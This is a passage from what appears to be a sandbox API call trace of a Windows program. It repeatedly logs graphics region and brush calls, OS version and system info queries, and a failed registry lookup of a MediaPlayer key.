dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.399] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.399] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.399] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.399] BeginPath (hdc=0x0) returned 0 [0017.399] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.399] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.399] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.399] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.399] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.399] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.399] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.399] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.399] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x88040713 [0017.400] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x7e04027d [0017.400] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x7040856 [0017.400] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x8040857 [0017.400] CombineRgn (hrgnDst=0x7040856, hrgnSrc1=0x88040713, hrgnSrc2=0x7e04027d, iMode=1) returned 1 [0017.400] CombineRgn (hrgnDst=0x8040857, hrgnSrc1=0x88040713, hrgnSrc2=0x7e04027d, iMode=4) returned 2 [0017.400] CreateSolidBrush (color=0xff) returned 0x910085d [0017.400] CreateSolidBrush (color=0xff0000) returned 0x5100844 [0017.402] DeleteObject (ho=0x5100844) returned 1 [0017.402] DeleteObject (ho=0x7e04027d) returned 1 [0017.402] DeleteObject (ho=0x88040713) returned 1 [0017.402] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.402] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.402] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.402] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.403] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.403] BeginPath (hdc=0x0) returned 0 [0017.403] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.403] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.403] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.403] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.403] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.403] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.403] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.403] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.403] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x7f04027d [0017.403] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x89040713 [0017.403] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040845 [0017.403] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040842 [0017.403] CombineRgn (hrgnDst=0x3040845, hrgnSrc1=0x7f04027d, hrgnSrc2=0x89040713, iMode=1) returned 1 [0017.403] CombineRgn (hrgnDst=0x5040842, hrgnSrc1=0x7f04027d, hrgnSrc2=0x89040713, iMode=4) returned 2 [0017.403] CreateSolidBrush (color=0xff) returned 0x6100844 [0017.403] CreateSolidBrush (color=0xff0000) returned 0x3100843 [0017.403] DeleteObject (ho=0x3100843) returned 1 [0017.403] DeleteObject (ho=0x89040713) returned 1 [0017.403] DeleteObject (ho=0x7f04027d) returned 1 [0017.403] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.403] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.403] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.403] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.403] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.403] BeginPath (hdc=0x0) returned 0 [0017.403] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.403] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.403] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.403] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.404] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.404] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.404] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.404] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.404] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8a040713 [0017.404] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8004027d [0017.404] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x5040840 [0017.404] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040841 [0017.404] CombineRgn (hrgnDst=0x5040840, hrgnSrc1=0x8a040713, hrgnSrc2=0x8004027d, iMode=1) returned 1 [0017.404] CombineRgn (hrgnDst=0x3040841, hrgnSrc1=0x8a040713, hrgnSrc2=0x8004027d, iMode=4) returned 2 [0017.404] CreateSolidBrush (color=0xff) returned 0x4100843 [0017.404] CreateSolidBrush (color=0xff0000) returned 0x710083a [0017.404] DeleteObject (ho=0x710083a) returned 1 [0017.404] DeleteObject (ho=0x8004027d) returned 1 [0017.404] DeleteObject (ho=0x8a040713) returned 1 [0017.404] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.404] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.404] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.404] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.404] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.404] BeginPath (hdc=0x0) returned 0 [0017.404] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.404] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.404] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.404] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.404] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.404] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.405] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.405] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.405] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8104027d [0017.405] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8b040713 [0017.405] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x304083f [0017.405] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2a0407ec [0017.405] CombineRgn (hrgnDst=0x304083f, hrgnSrc1=0x8104027d, hrgnSrc2=0x8b040713, iMode=1) returned 1 [0017.405] CombineRgn (hrgnDst=0x2a0407ec, hrgnSrc1=0x8104027d, hrgnSrc2=0x8b040713, iMode=4) returned 2 [0017.405] CreateSolidBrush (color=0xff) returned 0x810083a [0017.405] CreateSolidBrush (color=0xff0000) returned 0x1910021e [0017.405] DeleteObject (ho=0x1910021e) returned 1 [0017.405] DeleteObject (ho=0x8b040713) returned 1 [0017.405] DeleteObject (ho=0x8104027d) returned 1 [0017.405] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.405] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.405] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.405] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.405] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.405] BeginPath (hdc=0x0) returned 0 [0017.405] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.405] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.405] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.405] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.405] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.405] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.405] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.405] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.406] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8c040713 [0017.406] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8204027d [0017.406] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1e0407f8 [0017.406] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x21040804 [0017.406] CombineRgn (hrgnDst=0x1e0407f8, hrgnSrc1=0x8c040713, hrgnSrc2=0x8204027d, iMode=1) returned 1 [0017.406] CombineRgn (hrgnDst=0x21040804, hrgnSrc1=0x8c040713, hrgnSrc2=0x8204027d, iMode=4) returned 2 [0017.406] CreateSolidBrush (color=0xff) returned 0x1a10021e [0017.406] CreateSolidBrush (color=0xff0000) returned 0x241007bb [0017.406] DeleteObject (ho=0x241007bb) returned 1 [0017.406] DeleteObject (ho=0x8204027d) returned 1 [0017.406] DeleteObject (ho=0x8c040713) returned 1 [0017.406] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.406] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.406] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.406] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.406] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.406] BeginPath (hdc=0x0) returned 0 [0017.406] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.406] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.406] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.406] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.406] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.406] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.406] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.406] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.406] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8304027d [0017.407] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8d040713 [0017.407] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2040850 [0017.407] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2040852 [0017.407] CombineRgn (hrgnDst=0x2040850, hrgnSrc1=0x8304027d, hrgnSrc2=0x8d040713, iMode=1) returned 1 [0017.407] CombineRgn (hrgnDst=0x2040852, hrgnSrc1=0x8304027d, hrgnSrc2=0x8d040713, iMode=4) returned 2 [0017.407] CreateSolidBrush (color=0xff) returned 0x251007bb [0017.407] CreateSolidBrush (color=0xff0000) returned 0x2100855 [0017.407] DeleteObject (ho=0x2100855) returned 1 [0017.407] DeleteObject (ho=0x8d040713) returned 1 [0017.407] DeleteObject (ho=0x8304027d) returned 1 [0017.407] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.407] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.407] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.407] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.407] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.407] BeginPath (hdc=0x0) returned 0 [0017.407] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.407] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.407] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.407] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.407] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.407] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.407] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.407] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.407] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8e040713 [0017.407] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8404027d [0017.407] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x3040848 [0017.407] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x404084a [0017.407] CombineRgn (hrgnDst=0x3040848, hrgnSrc1=0x8e040713, hrgnSrc2=0x8404027d, iMode=1) returned 1 [0017.407] CombineRgn (hrgnDst=0x404084a, hrgnSrc1=0x8e040713, hrgnSrc2=0x8404027d, iMode=4) returned 2 [0017.408] CreateSolidBrush (color=0xff) returned 0x3100855 [0017.408] CreateSolidBrush (color=0xff0000) returned 0x410084c [0017.408] DeleteObject (ho=0x410084c) returned 1 [0017.408] DeleteObject (ho=0x8404027d) returned 1 [0017.408] DeleteObject (ho=0x8e040713) returned 1 [0017.408] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.408] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.408] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.408] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.408] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.408] BeginPath (hdc=0x0) returned 0 [0017.408] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.408] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.408] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.408] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.408] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.408] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.408] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.408] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.408] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8504027d [0017.409] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8f040713 [0017.409] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x204086c [0017.409] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x21040260 [0017.409] CombineRgn (hrgnDst=0x204086c, hrgnSrc1=0x8504027d, hrgnSrc2=0x8f040713, iMode=1) returned 1 [0017.409] CombineRgn (hrgnDst=0x21040260, hrgnSrc1=0x8504027d, hrgnSrc2=0x8f040713, iMode=4) returned 2 [0017.409] CreateSolidBrush (color=0xff) returned 0x510084c [0017.409] CreateSolidBrush (color=0xff0000) returned 0x5100867 [0017.409] DeleteObject (ho=0x5100867) returned 1 [0017.409] DeleteObject (ho=0x8f040713) returned 1 [0017.409] DeleteObject (ho=0x8504027d) returned 1 [0017.409] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.409] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.409] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.409] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.409] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.409] BeginPath (hdc=0x0) returned 0 [0017.409] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.409] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.409] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.409] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.409] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.409] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.409] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.409] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.409] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90040713 [0017.409] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8604027d [0017.409] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0xb040863 [0017.409] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x404084b [0017.409] CombineRgn (hrgnDst=0xb040863, hrgnSrc1=0x90040713, hrgnSrc2=0x8604027d, iMode=1) returned 1 [0017.409] CombineRgn (hrgnDst=0x404084b, hrgnSrc1=0x90040713, hrgnSrc2=0x8604027d, iMode=4) returned 2 [0017.410] CreateSolidBrush (color=0xff) returned 0x6100867 [0017.410] CreateSolidBrush (color=0xff0000) returned 0x410086a [0017.410] DeleteObject (ho=0x410086a) returned 1 [0017.410] DeleteObject (ho=0x8604027d) returned 1 [0017.410] DeleteObject (ho=0x90040713) returned 1 [0017.410] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.410] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.410] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.410] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.410] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.410] BeginPath (hdc=0x0) returned 0 [0017.410] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.410] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.410] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.410] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.410] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.410] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.410] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.410] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, 